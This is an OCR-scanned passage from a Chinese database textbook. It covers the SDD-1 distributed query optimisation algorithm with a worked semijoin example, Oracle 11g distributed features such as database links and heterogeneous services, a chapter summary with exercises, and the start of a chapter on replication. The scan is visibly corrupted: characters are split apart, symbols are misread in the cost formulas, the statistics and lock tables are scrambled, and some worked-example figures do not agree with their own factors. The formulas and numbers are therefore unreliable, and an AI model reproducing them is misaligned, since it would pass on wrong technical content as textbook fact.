该 算法 基于 “有 益 半 连 ”的 概念 。 一 次 半 连 的 通信 代价 就 是 传输 第 一 个 操作 数 的 连接 属 
性 到 第 二 个 操作 数 所 在 结 点 的 代价 ， 因 此 : 

Communication Cost (R [>^S) 
一 Co 十 [Size(IILA(S))/transmission_rate] 
一 Co 十 [nTuples(S)*nBitsInAttribute(A)/transmission ratel(A is key of S) 

半 连 的 “益处 ”表现 为 R 中 那些 无 关 元 组 传输 的 代价 ， 通 过 半 连 避免 了 : 

Benefit(R [>AS) 王 (1 一 SFA(S))*[nTuples(R)*nBitsInTuple(R)/transmission_rate] 
其 中 SFA(S) 为 连接 的 选择 率 (R 中 能 与 S 中 元 组 连接 成 功 的 比率 )， 可 估计 为 : 
SFA(S) 王 nTIuples(IILA(S))/nDistinct(A) 

nDistinct(A) 是 属性 A 的 值 域 中 不 同 值 的 个 数 。 算 法 过 程 为 : 

(1 ) 第 一 阶段 : 初始 化 。 选 择 和 投影 完成 所 有 本 地 规约 。 执 行 同一 结 点 的 半 连 以 减少 关 
系 的 大 小 。 产 生 所 有 跨 结 点 的 有 益 半 连 〈 半 连 的 代价 若 小 于 其 益处 即 认 为 是 有 益 半 连 )。 

(2 ) 第 二 阶段 : 有 益 半 连 的 选择 。 和 迭代 地 从 上 一 阶段 产生 的 有 益 半 连 集合 中 选择 最 有 益 
的 半 连 加 入 执行 策略 。 每 次 迭代 后 ， 都 要 修改 数据 库 统计 值 以 反映 半 连 的 引入 ,同时 修改 产 
生 新 的 有 益 半 连 集合 。 

(3 ) 第 三 阶段 : 选择 汇集 结 点 。 从 所 有 结 点 中 选择 一 个 结 点 ， 使 得 将 查询 涉及 的 所 有 关 
系 传送 到 该 结 点 时 代价 最 小 。 选 择 经 过 本 地 规约 后 驻 留 数据 量 最 大 的 结 点 ， 即 可 使 从 其 他 结 
点 传送 来 的 数据 量 最 小 。 

(4) 第 四 阶段 : 后 优化 。 去 除 不 必要 半 连 。 例 如 ， 如 果 关 系 R 驻 留 在 汇集 结 点 并 且 R 
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可 通过 半 连 减少 ,但 此 半 连 执行 后 不 再 用 于 减少 其 他 关系 ， 那 么 因为 在 汇集 阶段 R 不 会 移 
动 到 其 他 结 点 ， 对 R 的 半 连 也 就 无 用 ， 故 可 去 除 。 
下 面 的 例子 说 明了 前 面 的 过 程 。 


| 例 25.5 了》SDD-1 算法 
列 出 各 分 公司 的 详细 情况 ， 以 及 分 公司 管理 的 房产 和 管理 这 些 房产 的 职员 的 详细 情况 。 
用 SQL 语句 表示 该 查询 为 : 
SELECT * 


FROM Branch b, PropertyForRent p, Staff s, 
WHERE b.branchNo = p.branchNo AND p.staffNo = s.staffNo; 


假设 Branch 关系 在 结 点 1，PropertyForRent 关系 在 结 点 2，Staff 关系 在 结 点 3。 进 一 步 
假设 初始 化 1 条 消息 的 代价 C0 为 0， 传输 率 为 1。 图 25-21 为 这 些 关 系 的 初始 统计 值 。 最 初 
的 半 连 集合 为 : 





Branch 1 50 200 10 000 
PropertyForRent | 2 200 600 120 000 
Staff 3 100 500 50 000 


图 25-21 Branch、PropertyForRent 和 Staff 的 初始 数据 统计 «< 





b.branchNo | 1600 1 

pbranchNo | 640 0.1 
s.staffNo 2880 0.9 
p.staffNo 1280 0.2 


SJ1:. PropertyForRent Pwranonwo Branch ”应 改 为 (1 一 1)*120 000 = 0; 代价 为 1600 

SJz: Branch Pbanew PropertyForRent ”应 改 为 (1 一 0.1)*10 000 = 9000; 代价 为 640 
SJa: PropertyForRent serve Staff 应 改 为 (1 一 0.9)*120 000 = 12 000; 代价 为 2880 
SJ4: Staff vssm PropertyForRent 应 改 为 (1 一 0.9)*50 000 = 40 000; 代价 为 1280 


此 时 ， 有 益 的 半 连 有 SJ,、SJ3 和 SJ4， 因 此 将 SJ ( 差 最 大 者 ) 加 入 执行 策略 。 现 在 根据 
这 个 半 连 修改 统计 数据 ，Staff 的 基数 变 为 100X0.2=20， 大 小 变 为 50 000X0.2==10 000， 
而 选择 因子 估计 为 0.9X0.2=0.18。 下 一 轮 迭 代 选 择 代价 为 3720 的 有 益 半 连 SJ: 
PropertyForRent [>sate Staff'， 并 将 其 加 入 执行 策略 。 同 样 修改 统计 数据 ，PropertyForRent 
的 基数 改 为 200X0.9= 二 180， 大 小 变 为 120 000X0.9==108 000。 再 下 一 轮 迭 代 发 现 半 连 SJ,: 
Branch [>samN。PropertyForRent 是 有 益 的 ， 将 其 加 入 执行 策略 。 修 改 关 于 Branch 的 统计 数 
据 ， 结 果 基 数 变 为 40X0.1= 二 4 ， 大 小 变 为 10 000X0.1 二 1000。 

规约 后 存在 结 点 1 的 数据 量 为 1000， 结 点 2 的 为 108 000， 结 点 3 的 为 10 000。 结 点 2 
被 选 为 汇集 结 点 。 在 后 优化 阶段 ，SJ3 去 除 。 最 后 的 策略 是 送 Staff |>samN。PropertyForRent 
和 Branch [>sare PropertyForRent 到 结 点 2。 

另外 一 些 众所周知 的 分 布 式 优化 算法 是 AHY (Apers 等 ，1983 ) 和 Distributed Ingres 
( Epstein 等 ，1978 ) 。 感 兴趣 的 读者 也 可 参看 本 领域 若干 文献 。 例 如 ，Yu 和 Chang ( 1984 )， 
Steinbrunn 等 (1997 ) 以 及 Kossmann ( 2000 )。 


25.7 ”Oracle 中 的 分 布 特性 


在 本 章 的 最 后 ， 要 研究 Oraclellg (Oracle Corporation，2008d) 的 分 布 式 DBMS 功能 。 
在 本 节 中 ， 使 用 Oracle 的 术语 一 一 即 把 关系 看 作 是 由 行 和 列 组 成 的 表 。 附 录 H.2 对 Oracle 
进行 了 介绍 。 
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Oracle 的 DDBMS 功能 


像 许多 商品 化 DDBMS 一 样 ，Oracle 不 支持 在 第 24 章 中 讨论 的 那 类 分 段 机 制 。 虽 然 数 
据 库 管 理 员 可 以 手工 分 布 数据 达到 同样 的 目的 ， 但 是 这 要 求 终端 用 户 了 解 关 系 如 何 分 段 并 将 
这 些 信 息 反映 到 应 用 程序 中 去 。 换 句 话说, Oracle DDBMS 虽然 支持 前 面 提 到 的 位 置 透 明 性 ， 
但 它 不 支持 分 段 透明 性 。 在 本 节 中 ， 给 出 了 Oracle 的 DDBMS 功能 的 概述 ， 包 括 : 

e 连通 性 。 

全 局 数据 库 名 。 
数据 库 连 接 。 

事务 。 

引用 完整 性 。 

异 构 分 布 式 数据 库 。 
分 布 式 查询 优化 。 

下 一 章 再 讨论 Oracle 的 复制 机 制 。 
连通 性 

Oracle Net Services 是 Oracle 提供 的 数据 访问 应 用 ， 支 持 在 客户 端 与 服务 器 端 之 间 的 通 
信 ( 较 早 的 Oracle 版 本 使 用 SQL*Net 或 Net8 )。Oracle Net Services 可 以 在 任何 网 络 中 进 
行 客 户 - 服务 器 通信 和 服务 器 - 服务 器 通信 ， 支 持 分 布 式 处 理 和 分 布 式 DBMS 能 力 。 即 使 
进程 与 数据 库 实例 在 同一 人 台 机 器 上 运行 ， 仍 然 需 要 使 用 Net Services 建立 数据 库 连接 。Net 
Services 还 负责 转换 不 同 操作 系统 间 的 字符 集 和 数据 表示 。Net Services 通过 向 透明 网 络 基 
层 ( Transparent Network Substrate，TNS ) 发 送 连接 请 求 建立 连接 ，TNS 决定 应 当 由 哪 台 服 
务 器 处 理 请 求 ， 并 且 使 用 适当 的 网 络 协议 (例如 ，TCP/IP) 发 送 请 求 。Net Services 还 能 通 
过 连接 管理 器 ( Connection Manager，CMAN) 处 理 使 用 不 同 网 络 协议 的 机 器 之 间 的 通信 ， 
而 这 在 Oracle 7 中 是 由 多 协议 交换 器 (MultiProtocol Interchange) 处 理 的 。 

在 Oracle 早期 版 本 中 ，Oracle Names 将 分 布 式 环境 中 数据 库 的 存储 信息 放 在 一 个 单独 
的 地 方 。 当 应 用 提出 连接 请 求 时 ， 系 统 查 询 Oracle Names 库 得 到 数据 库 服务 器 的 位 置 。 不 
使 用 Oracle Names 的 另 一 种 方法 是 在 每 台 客 户 机 的 本 地 tnsnames.ora 文件 中 存储 这 些 信息 。 
在 Oraclellg 中 ， 若 Oracle 网 络 使 用 一 个 LDAP 兼容 的 目录 服务 器 ， 目 录 服 务 器 自动 为 网 络 
中 每 一 个 Oracle 数据 库 创 建 和 管理 全 局 数据 库 链 接 (作为 Net Services 名 )。 任 何 数据 库 的 
用 户 和 PL/SQL 子 程序 都 能 用 一 个 全 局 链接 来 访问 对 应 远程 数据 库 中 的 对 象 。 下 面 简要 讨论 
数据 库 链 接 。 

全 局 数据 库 名 

每 个 分 布 式 数据 库 都 有 一 个 名 称 ， 称 为 全 局 数据 库 名 ， 系 统 中 所 有 的 数据 库 名 都 各 不 
相同 。Oracle 通过 在 数据 库 的 网 络 域名 前 级 上 本 地 数据 库 名 来 得 到 全 局 数据 库 名 。 域 名 必须 
遵守 标准 Internet 约定 ， 其 中 分 级 必须 使 用 圆 点 按照 从 叶 结 点 到 根 结 点 、 从 左 到 右 的 顺序 分 
隔 。 例 如 ， 图 25-22 展示 了 DreamHome 可 能 的 分 级 组 织 的 数据 库 。 在 图 中 虽然 存在 两 个 称 
为 Rentals 的 本 地 数据 库 ， 但 是 可 以 使 用 网 络 域名 LONDON.SOUTH.COM 来 区 分 在 伦敦 的 
数据 库 和 在 格拉 斯 哥 的 数据 库 。 在 这 种 情况 下 ， 全 局 数据 库 名 是 : 


RENTALS.LONDON.SOUTH.COM 
RENTALS.GLASGOW.NORTH.COM 
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数据 库 连 接 

Oracle 中 的 分 布 式 数据 库 依靠 数据 库 连接 建立 ， 数 据 库 连接 定义 了 从 一 个 Oracle 数据 
库 到 另 一 个 (可 能 不 是 Oracle) 数据 库 的 通信 和 路径。 数据 库 连接 的 目的 就 是 为 对 远程 数据 进 
行 查询 和 更 新 ， 实 际 上 可 视 为 一 种 已 被 存储 的 对 远程 数据 库 的 登录 。 数 据 库 连接 赋予 的 名 称 
应 与 所 涉及 的 远程 数据 库 的 全 局 数据 库 名 相同 ， 此 时 ， 数 据 库 连接 对 于 分 布 式 数据 库 的 用 户 
来 说 实际 上 是 透明 的 。 例 如 ， 下 列 语句 创建 了 本 地 数据 库 到 格拉 斯 哥 远 程 数 据 库 的 数据 库 
连接 : 

CREATE PUBLIC DATABASE LINK RENTALS.GLASGOW.NORTH.COM; 

一 旦 数据 库 连接 建立 ， 就 可 用 来 查阅 表 ， 通 过 向 在 SQL 语句 中 用 到 的 表 或 视图 名 添加 
@databaselink 来 浏览 远程 数据 库 。 远 程 表 或 视图 可 以 使 用 SELECT 语句 查询 。 通 过 Oracle 
分 布 式 选 项 ， 远 程 表 和 视图 也 可 以 使 用 INSERT、UPDATE 和 DELETE 语句 访问 。 例 如 ， 
可 以 使 用 如 下 的 SQL 语句 来 查询 和 更 新 在 远程 结 点 上 的 Sta 任 表 : 


SELECT * FROM Staff@RENTALS.GLASGOW.NORTH.COM; 
UPDATE Staff@RENTALS.GLASGOW.NORTH.COM SET salary = salary* 1.05; 


用 户 还 可 以 通过 在 数据 库 名 前 加 上 模式 名 来 访问 在 同一 个 数据 库 中 属于 其 他 人 的 表 。 例 
如 ， 如 果 假 设 当前 用 户 访问 Supervisor 模式 下 的 Viewing 表 ， 可 以 使 用 如 下 的 SQL 语句 : 

SELECT * FROM Supervisor.Viewing@RENTALS.GLASGOW.NORTH.COM:; 

这 个 语句 将 当前 用 户 连 接 到 远程 数据 库 ， 然 后 查询 Supervisor 模式 下 的 Viewing 表 。 可 
以 通过 创建 同 义 名 ， 隐 藏 Supervisor 的 Viewing 表 是 在 远程 数据 库 上 这 一 事实 。 下 面 的 语句 
导致 以 后 所 有 对 Viewing 的 引用 实际 将 访问 Supervisor 拥有 的 远程 Viewing 表 : 


CREATE SYNONYM Viewing FOR 
Supervisor.Viewing@RENTALS.GLASGOW.NORTH.COM; 
SELECT * FROM Viewing; 


通过 这 种 方法 ， 同 义 名 能 同时 提供 数据 独立 性 和 本 地 透明 性 。 
事务 
Oracle 支持 涉及 远程 数据 的 事务 ， 具 体 包括 : 
@ 远程 SQL 语句。 远程 查询 (remote query) 是 从 一 或 多 个 远程 表 中 选择 信息 的 查询 
语句 ， 这 些 表 均 驻 留 在 同一 个 远程 结 点 上 。 远 程 更 新 ( remote update) 是 对 一 个 或 多 
个 远程 表 中 信息 进行 修改 的 更 新 语句 ， 这 些 表 也 驻 留 在 同一 个 远程 结 点 上 。 
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分 布 式 SQL 语句 。 分 布 式 查询 是 从 两 个 或 多 个 结 点 检索 信息 。 分 布 式 更 新 是 对 两 个 
或 多 个 结 点 中 的 数据 进行 修改 。 一 个 分 布 式 更 新 可 能 借助 像 过 程 或 触发 器 这 样 的 PL/ 
SQL 子 程序 ， 子 程序 包括 两 个 或 多 个 访问 不 同 结 点 上 的 数据 的 远程 更 新 。Oracle 将 
该 程序 中 的 语句 送 到 远程 结 点 ， 它 们 作为 一 个 单元 或 成 功 执行 或 失效 。 

远程 事务 。 远 程 事务 包括 一 个 或 多 个 远程 语句 ， 它 们 都 涉及 同一 个 远程 结 点 。 


e 分 布 式 事务 。 分 布 式 事务 包括 一 个 或 多 个 语句 ， 这 些 语句 独自 或 作为 一 组 修改 分 布 


式 数据 库 中 两 个 或 多 个 不 同 结 点 上 的 数据 。 此 时 ，Oracle 用 25.4.3 节 讨 论 的 两 阶段 
提交 ( 2PC) 协议 保证 分 布 式 事务 的 完整 性 。 


引用 完整 性 

Oracle 不 允许 在 分 布 式 系统 中 定义 跨 数据 库 的 引用 完整 性 约束 〈 也 就 是 ， 在 一 个 表 上 说 
明 的 引用 完整 性 约束 中 的 外 部 关键 字 不 能 引用 远程 表 的 主 关键 字 或 是 唯一 关键 字 )。 然 而 ， 
跨 数据 库 的 父子 表 关 系 可 以 使 用 触发 器 维持 。 
异 构 分 布 式 数据 库 

在 Oracle 异 构 式 DDBMS 中 ， 至 少 有 一 个 DBMS 是 非 Oracle 系统 。Oracle 可 以 通过 使 
用 异 构 服 务 ( Heterogeneous Services) 和 非 Oracle 系统 指定 的 异 构 服务 代理 ， 对 用 户 隐 藏 分 
布 和 异 构 。 异 构 服 务 代理 负责 与 非 Oracle 系统 和 Oracle 服务 器 中 的 蜡 构 服务 组 件 进行 通信 。 
该 代理 代表 Oracle 服务 器 执行 SQL、 过 程 以 及 非 Oracle 系统 中 的 事务 请 求 。 

异 构 服 务 可 以 使 用 如 下 的 工具 进行 访问 : 


Oracle 数据 库 网 关 。 它 提供 了 对 非 Oracle DBMS 的 SQL 访问 ， 包 括 DB2/400、 
OS/390 上 的 DB2、Informix、Sybase、SQL Server、Teradata、IMS、Adabas 和 
VSAM。 这 个 网 关 通 常 运 行 在 驻 有 非 Oracle DBMS 而 不 是 驻 有 Oracle 服务 器 的 机 器 上 。 
但 是 ，DRDA (参见 24.5.2 节 ) 的 透明 网 关 不 要 求 目 标 系统 上 有 任何 Oracle 软件 ， 它 负 
责 提 供 对 DRDA 可 用 数据 库 如 DB2，SQL/DS 和 SQL/400 的 SQL 访问 。 图 25-23a 说明 
了 透明 网 关 的 结构 。 

用 于 ODBC 的 Oracle 数据 库 网 关 。 这 种 网 关 与 消费 者 提供 的 ODBC 驱动 器 相连 接 。 
其 功能 比 Oracle 数据 库 网 关 更 受 限 。 图 25-23b 说 明了 用 于 ODBC 结构 的 Oracle 数 
据 库 网 关 。 


异 构 服 务 的 特点 包括 : 


分 布 式 事务 。 事 务 使 用 两 段 式 提交 (参见 25.4.3 节 ) 可 以 跨越 Oracle 和 非 Oracle 
透明 SQL 访问 。 应 用 程序 发 出 的 SQL 语句 透明 地 转换 为 非 Oracle 系统 可 识别 的 
SQL 语句 。 

过 程 访 问 。 像 消息 系统 和 排队 系统 一 类 过 程 化 系统 ， 能 从 Oracle 11g 服务 器 中 用 PL/ 
SQL 远程 过 程 调用 来 访问 。 

数据 字典 翻译 。 为 了 使 非 Oracle 系统 就 像 一 个 Oracle 服务 器 ， 那 些 引 用 了 Oracle 数 
据 字典 表 的 SQL 语句 需 转换 成 引用 非 Oracle 系统 数据 字典 表 的 SQL 语句 。 

SQL 和 存储 过 程 通过 。 应 用 程序 可 以 使 用 一 个 非 Oracle 系统 的 SQL 方言 直接 访问 
该 系统 。 而 基于 SQL 的 非 Oracle 系统 中 的 存储 过 程 被 处 理 为 PL/SQL 远程 过 程 。 
支持 自然 语言 。 异 构 服 务 支 持 多 字 节 字符 集 ， 并 且 将 非 Oracle 系统 的 字符 集 翻译 成 
Oracle 系统 的 字符 集 。 
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e 优化 。 异 构 服 务 能 收集 非 Oracle 系统 的 某 些 表 和 索引 的 统计 信息 ， 传 给 Oracle 的 基 
于 代价 估算 的 优化 器 。 


Oracle 服 务 器 


Oraclellg 








Oracle 网 


非 Oracle 服 务 器 








a ) 在 非 Oracle 系 统 中 用 Oracle 数据 库 网 关 
Oracle 服 务 器 





Oraclellg 






Oracle 网 








非 Oracle 服 务 器 





b ) 用 于 ODBC 结 构 的 Oracle 数据 库 网 关 
图 25-23 Oracle 异 构 服 务 


分 布 式 查 询 优化 

分 布 式 查询 可 以 通过 本 地 Oracle DBMS 分 解 成 为 对 应 的 多 个 远程 查询 ， 并 发 送 到 远程 
DBMS 执行 。 远 程 DBMS 执行 查询 并 且 向 本 地 结 点 发 送 结果 。 从 而 使 本 地 结 点 可 以 执行 
任何 需要 的 后 续 处 理 ， 并 且 向 用 户 或 应 用 程序 返回 结果 。 仅 从 远程 表 中 抽取 必要 的 数据 ， 
从 而 减少 需要 传送 的 数据 总 量 。 分 布 式 查询 优化 使 用 Oracle 的 基于 代价 估算 的 优化 器 ， 该 
技术 在 23.6 节 中 已 经 讨论 。 
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本 章 小 结 


分 布 式 事务 处 理 的 目标 和 集中 式 系统 一 样 ， 但 更 加 复杂 ， 因 为 DDBMS 必须 保证 全 局 事务 和 每 个 子 
事务 的 原子 性 。 

如 果 每 个 结 点 的 事务 执行 调度 是 可 串 行 的 ， 并 且 所 有 本 地 串 行 次 序 一 致 那么 全 局 调度 ( global 
schedule) (所 有 本 地 调度 的 并 ) 同样 也 是 可 串 行 的 。 这 要 求 在 所 有 的 结 点 上 的 等 价 串 行 调度 中 ， 所 
有 的 子 事务 出 现 的 顺序 一 致 。 

有 两 种 方法 可 以 用 来 保证 分 布 式 可 串 行 性 : 锁 (locking) 和 时 间 戳 (timestamping)。 在 二 段 锁 (two- 
phase locking，2PL) 中 ， 事 务 要 求 在 解锁 之 前 获得 所 有 的 锁 。 二 段 锁 协 议 可 以 使 用 集中 式 、 主 备份 
或 是 分 布 式 锁 管 理 器 。 也 可 以 使 用 多 数 投票 的 方法 。 使 用 时 间 惟 时 ， 事 务 排 序 按照 冲突 时 旧事 务 具 
有 较 高 的 优先 权 的 规则 。 

分 布 式 死 锁 ( distributed deadlock) 涉及 归并 各 本 地 等 待 图 后 检查 是 否 存在 环 。 如 果 检 测 到 环 ， 必 须 
撤销 和 重启 一 个 或 多 个 事务 ， 直 到 环 被 打破 。 在 分 布 式 DBMS 中 处 理 死 锁 检测 有 三 种 常用 的 方法 : 
集中 式 (centralized)、 分 层 式 (hierarchical) 和 分 布 式 (distributed) 死 锁 检测 。 

在 分 布 式 环境 中 引起 故障 的 原因 有 消息 丢失 、 通 信和 链 路 故障 、 结 点 故障 和 网 络 分 区 。 为 了 便于 恢 
复 ， 每 个 结 点 都 维护 自己 的 日 志文 件 。 日志 可 以 用 来 在 发 生 故 障 的 时 候 恢复 和 撤销 事务 。 
两 段 式 提交 (two-phase commit ，2PC) 协议 包含 投票 和 决定 阶段 ， 协 调 器 询问 所 有 的 参与 者 是 否 
准备 好 提交 。 如 果 有 一 个 参与 者 投了 撤销 票 ， 全 局 事务 和 每 个 本 地 事务 都 必须 撤销 。 只 有 当 所 有 的 
参与 者 都 投票 提交 ， 全 局 事务 才能 提交 。2PC 协议 在 出 现 结 点 故障 的 时 候 会 使 结 点 阻塞 。 
三 段 式 提交 ( three-phase commit ，3PC) 是 非 阻塞 协议 ， 协 调 者 在 投票 和 决定 两 阶段 之 间 向 所 有 参 
与 者 另外 发 送 一 条 消息 ， 要 求 它们 预 提交 事务 。 

X/Open DTP 是 分 布 式 2PC 协议 的 一 种 基于 OSI-TP 的 分 布 式 事务 处 理 结构 。 这 个 结构 定义 了 应 用 
程序 编程 接口 以 及 事务 应 用 、 事 务 管理 器 、 资 源 管理 器 和 通信 管理 器 之 间 的 交互 。 

分 布 式 查询 处 理 分 为 四 个 阶段 : 查询 分 解 、 数 据 定位 、 全 局 优化 和 本 地 优化 。 查 询 分 解 (query 
decomposition) 针对 基于 全 局 关系 表示 的 查询 ， 采 用 第 23 章 讨论 的 技术 进行 部 分 优化 。 数 据 定位 
( data localization ) 考虑 数据 是 如 何 分 布 的 ， 据 此 将 关系 代数 树 的 叶 结 点 中 的 全 局 关系 用 一 个 重 构 算 
法 替代 。 全 局 优化 (global optimization) 利用 统计 信息 找 出 近似 最 优 的 执行 策略 。 局 部 优化 ( local 
optimization) 在 涉及 该 查询 的 各 个 本 地 结 点 上 进行 。 

分 布 式 查 询 优 化 的 代价 模型 可 基于 总 代价 ， 也 可 基于 响应 时 间 ， 即 查询 从 开始 到 结束 的 时 间 。 后 一 
种 模型 考虑 了 分 布 式 系统 的 固有 并 行 性 。 代 价 需 考虑 本 地 处 理 代价 ( IO 和 CPU) 和 网 络 传输 代价 ， 
在 WAN 中 ， 网 络 传输 代价 将 成 为 考虑 减少 的 首要 成 分 。 

当主 要 的 代价 构成 是 传输 时 间 时 ， 半 连 操作 对 改进 分 布 式 连接 的 处 理性 能 非常 有 效 ， 它 主要 用 于 减 
少 结 点 之 间 数 据 传输 的 量 。 


思考 题 
25.1 在 分 布 式 环境 中 ， 加 锁 的 基本 算法 可 以 分 为 集中 式 、 主 备份 式 和 分 布 式 。 试 对 这 些 算法 进行 


比较 。 


25.2 ”分布 式 死 锁 检测 的 最 有 名 方法 之 一 是 由 Obermarck 提出 的 。 试 解释 Obermarck 方法 的 工作 原理 ， 


如 何 检测 及 处 理 死 锁 。 


25.3 ” 画 出 除 集中 式 拓扑 结构 以 外 的 男 两 种 两 段 式 提交 的 拓扑 结构 。 
25.4 解释 名 词 “ 非 阻塞 协议 ”， 并 解释 为 什么 两 段 式 提交 协议 不 是 非 阻塞 协议 。 
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25.5 ”讨论 为 什么 除非 所 有 结 点 都 发 生 故 障 否 则 三 段 式 提交 协议 是 非 阻 塞 协议 。 
25.6 ”说 明 分 布 式 查 询 优 化 的 分 层 结构 及 每 层 的 功能 细节 。 

25.7 ”讨论 在 分 布 式 查 询 优化 中 需要 考虑 哪些 代价 并 给 出 两 种 不 同 的 代价 模型 。 
25.8 ”描述 R* 和 SDD-1 所 用 的 分 布 查询 优化 算法 。 

25.9 ”简要 描述 Oracle 11g 的 分 布 功能 。 


习题 

25.10 ”假设 DreanHome 的 常务 经 理 要 求 你 调查 该 组 织 机 构 的 数据 分 布 需求 ， 并 且 准 备 一 份 关于 分 布 
式 DBMS 应 用 的 报告 。 报 告 必须 对 集中 式 DBMS 和 分 布 式 DBMS 技术 进行 比较 ， 并 且 指 出 实 
现 一 个 DDBMS 的 优点 和 缺点 ， 以 及 任何 可 以 预见 的 问题 。 最 后 ， 报 告 应 该 包含 一 组 完全 合理 
的 建议 ， 帮 助 推荐 一 个 适当 的 解决 方案 。 

25.11 ”给 出 在 分 布 式 环 境 中 集中 式 的 两 段 提交 协议 的 详细 描述 。 简 要 概括 协调 器 和 参与 者 的 算法 。 

25.12 ”给 出 在 分 布 式 环境 中 三 段 提交 协议 的 详细 描述 。 简 要 概括 协调 器 和 参与 者 的 算法 。 

25.13 ”分析 一 下 你 目前 正在 使 用 的 DBMS ， 并 确定 它 对 X/Open DTP 模型 提供 的 支持 。 

25.14 考虑 下 面 五 个 事务 TI, Ti, Ts, Ts 和 Ts: 

Ti 在 结 点 $1 初始化， 并 且 在 结 点 $; 衍生 了 一 个 代理 。 

T; 在 结 点 $3 初始化， 并 且 在 结 点 Si 衍生 了 一 个 代理 。 

T; 在 结 点 $1 初始化， 并 且 在 结 点 $; 衍生 了 一 个 代理 。 

T4 在 结 点 S: 初始 化 ,并且 在 结 点 S; 衍生 了 一 个 代理 。 

Ts 在 结 点 S; 初始 化 。 

这 些 事务 的 加 锁 信 息 在 下 表 中 列 出 。 


事 务 被 事务 加 锁 的 数据 项 事务 正在 等 待 数据 项 操作 涉及 的 结 点 


T Me EY EE Si 
T2 Si 
Ta S; 
Ts Si 
Ts Ss 
Ta S; 
Ta Ss 
Ts S3 


-~ 
- - 


(a) 为 每 一 个 结 点 创建 本 地 的 等 待 图 。 读 者 可 以 从 本 地 WFG 中 得 出 什么 结论 ? 
(b) 使 用 举例 的 事务 ， 说明 Obermarck 的 分 布 式 死 锁 监测 方法 如 何 工 作 ， 可 以 从 全 局 等 待 图 中 
得 出 什么 结论 ? 
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| 本 章 目标 

本 章 我 们 主要 学 习 : 

@ 数据 库 复制 的 益处 
同步 复制 与 异步 复制 的 差别 
数据 库 复制 应 用 举例 
复制 系统 的 基本 组 成 
数据 库 复制 服务 器 的 功能 
数据 所 有 权 的 主要 类 型 ( 主 备份 与 从 备份 ) 
与 数据 库 复 制 有 关 的 主要 实现 问题 
不 同 复制 技术 的 优 缺 点 
复制 数据 库 系 统 中 数据 库 的 恢复 
如 何 检测 不 一 致 性 
移动 计算 如 何 支持 移动 工作 者 
移动 DBMS 的 功能 
与 移动 DBMS 相关 的 问题 
Oracle DBMS 如 何 支 持 数 据 复制 


前 面 两 章 讨论 了 与 分 布 式 数据 库 管理 系统 (DDBMS ) 相关 的 基本 概念 和 问题 。 从 用 户 
的 观点 看 ，DDBMS 提供 的 功能 非常 请 人 ,但 要 实际 实现 这 些 功 能 所 需 的 协议 和 算法 十 分 复 
杂 ， 而 且 由 此 引发 的 一 些 严重 问题 可 能 完全 抵消 这 类 技术 的 优势 。 本 章 讨论 所 谓 复制 方案 以 
及 如 何 保持 多 个 数据 副本 一 致 性 的 问题 。 与 前 一 章 给 出 的 分 布 并 发 控制 模型 相反 ， 这 里 特别 
关注 复制 方案 和 专用 复制 服务 器 ， 它 负责 控制 远程 结 点 上 的 数据 副本 。 几 乎 所 有 的 数据 库 供 
应 商都 提供 了 这 样 或 那样 的 复制 方案 ， 还 有 些 供 应 商 甚至 提供 多 种 数据 复制 方案 供 选 择 。 本 
章 稍 后 部 分 还 将 集中 讨论 复制 数据 库 的 一 种 特殊 应 用 ( 称 之 为 移动 数据 库 )， 以 及 该 技术 如 
何 支 持 移动 工作 者 。 


| 本 章 结构 

26.1 节 介 绍 数据 库 复制 的 概念 及 其 益处 。26.2 节 首 先 分 析 复 制 体系 结构 ， 包 括 基于 内 
核 和 基于 中 间 件 两 种 实现 ; 然后 讨论 更 新 处 理 及 更 新 到 其 他 结 点 的 传播 ， 以 及 数据 复制 的 所 
有 权 模 型 。26.3 节 讨 论 复制 方案 ， 包 括 积极 主 备 份 方案 、 懒 情 主 备份 方案 、 随 处 积极 更 新 
方案 和 随处 懒惰 更 新 方案 。26.4 节 讨 论 移动 数据 库 和 移动 DBMS 必 备 的 功能 。26.5 节 简 介 
Oracle 11g 复制 管理 的 情况 。 

本 章 中 的 例子 取 自 11.4 节 和 附录 A 中 的 DreamHome 案例 。 
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26.1 数据 库 复 制 简介 


| 复制 | 在 一 个 或 多 个 结 点 上 产生 和 再 生产 多 个 数据 副本 的 过 程 。 


数据 库 复制 是 一 种 重要 的 机 制 ， 它 能 使 一 个 组 织 机 构 做 到 : 只 要 其 用 户 需要 ， 无 论 何 时 

何 地 都 能 访问 当前 数据 。 这 意味 着 增强 了 系统 容错 能 力 ， 一 个 数据 库 失 效 后 ， 另 一 个 能 继续 

完成 查询 或 更 新 请 求 。 复 制 有 时 能 用 出 版 业 的 出 版 商 、 分 销 商 和 订户 来 类 比 说 明 。 

e 出 版 商 。 相 当 于 通过 复制 使 得 数据 在 别处 可 用 的 那个 DBMS。 出 版 商 拥 有 一 种 或 多 
种 出 版 物 (由 一 篇 或 多 篇 文章 构成 )， 每 个 出 版 物 定义 了 一 组 在 逻辑 上 相关 的 对 象 和 
数据 ， 用 于 复制 。 

。 分 销 商 。 相 当 于 存储 复制 数据 和 关于 出 版 物 元 数据 的 那个 DBMS。 分 销 商 有 时 也 像 

一 个 队列 ， 数 据 从 出 版 商 处 排 着 队 移动 到 订户 。 一 个 DBMS 既 可 作为 出 版 商 ， 亦 可 

作为 分 销 商 。 

订户 。 相 当 于 接收 复制 数据 的 那个 DBMS。 订 户 能 从 多 个 出 版 商 接 收 数据 和 出 版 

物 。 根 据 所 选 复制 类 型 ,订户 还 能 把 数据 的 变化 传 回 给 出 版 商 或 再 出 版 数据 给 其 他 

订户 。 

复制 拥有 类 似 于 分 布 式 数据 库 的 好 处 ， 例 如 : 

e 增强 了 可 靠 性 和 可 用 性 。 因 数据 在 多 于 一 个 结 点 上 被 复制 ， 一 个 结 点 或 通信 和 链 路 出 
了 故障 ， 不 会 造成 所 有 数据 都 不 可 访问 。 复 制 也 能 把 数据 复制 到 后 援 服务 器 上 ， 当 
系统 出 现 预料 之 中 或 预料 之 外 的 停顿 时 ， 转 向 使 用 该 服务 器 。 

e 改善 了 性 能 。 当 某 些 远程 数据 被 复制 并 存储 在 本 地 结 点 后 ， 某 些 查 询 就 可 在 本 地 运 
行 而 不 必 访问 远程 结 点 ; 此 外 ， 对 于 负载 过 重 的 中 心服 务 器 使 用 复制 技术 能 更 好 地 
在 多 个 服务 器 间 平 衡 资源 ， 从 而 改善 性 能 。 例 如 ， 当 应 用 程序 执行 读 操 作 多 于 写 操 
作 时 (例如 在 线 的 商品 目录 )， 复制 负 载 中 读 的 部 分 ， 即 在 多 个 数据 库 中 缓存 只 读数 
